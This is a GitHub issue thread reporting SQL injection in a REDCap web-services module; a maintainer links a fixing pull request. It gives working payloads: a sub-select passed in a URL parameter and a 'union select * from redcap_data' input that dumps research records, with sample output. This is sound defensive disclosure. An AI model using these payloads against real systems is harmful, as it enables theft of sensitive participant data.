### ISSUE TITLE
SQL injection risks with parameters? Yes, I can do it. 

### ISSUE THREAD

**Issue by pbchase** [ctsit/redcap_webservices#2]
I have some concerns about the risks of SQL injection with this tool. I am not sure how concerned to be, but here is a test I did that produced interesting results.

With this configured query

```
record_count from redcap_record_counts where project_id in (:pid)
```

I was able to use a sub-select with this URL

```
http://redcap.test/redcap/redcap_v8.3.0/ExternalModules/?prefix=redcap_webservices&id=3&page=plugins%2Fendpoint&query_id=record_count&pid=select%20project_id%20from%20redcap_projects
```

to produce this result

```
{
  "success": true,
  "data": [
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "0"
    },
    {
      "record_count": "27"
    }
  ]
}
```

I have yet to figure out how to do more dangerous things, but I am trying.

**Comment by pbchase** [comment]
Here is something actually dangerous.  With this query that had the misfortune of being 6 columns wide,

```
project_name, app_title, status, creation_time, created_by, surveys_enabled 
from redcap_projects 
where project_id = :pid
```

I was able to dump the entire redcap_data table by specifying this for the PID

```
17 union select * from redcap_data 
```

Here's the beginning of that output

```
{
  "success": true,
  "data": [
    {
      "project_name": "something_with_data",
      "app_title": "something with data",
      "status": "0",
      "creation_time": "2018-03-27 15:12:37",
      "created_by": "1",
      "surveys_enabled": "0"
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "record_id",
      "created_by": "2-1",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "icf_first_name",
      "created_by": "Jane",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "icf_last_name",
      "created_by": "Doe",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "icf_date",
      "created_by": "2017-12-11",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "informed_consent_and_addendum_complete",
      "created_by": "2",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "upload_of_signed_icfs_complete",
      "created_by": "2",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_date",
      "created_by": "2017-11-29",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_name_first",
      "created_by": "Jane",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_name_init",
      "created_by": "L",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_name_last",
      "created_by": "Doe",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_date_birth",
      "created_by": "1953-10-25",
      "surveys_enabled": null
    },
    {
      "project_name": "17",
      "app_title": "44",
      "status": "2-1",
      "creation_time": "demo_street_ad",
      "created_by": "111 North Main Street",
      "surveys_enabled": null
    },
    ...
  ]
}
```

_that_ is truly dangerous

**Comment by pbchase** [comment]
FYI, my guide for the _Union Exploitation Technique_ was [Testing for SQL Injection (OTG-INPVAL-005)](https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Union_Exploitation_Technique)

**Comment by tbembersimeao** [comment]
Nice catch! Here is a [PR](https://github.com/ctsit/redcap_webservices/pull/4) to fix this issue.

**Comment by pbchase** [comment]
Fixed by PR #4
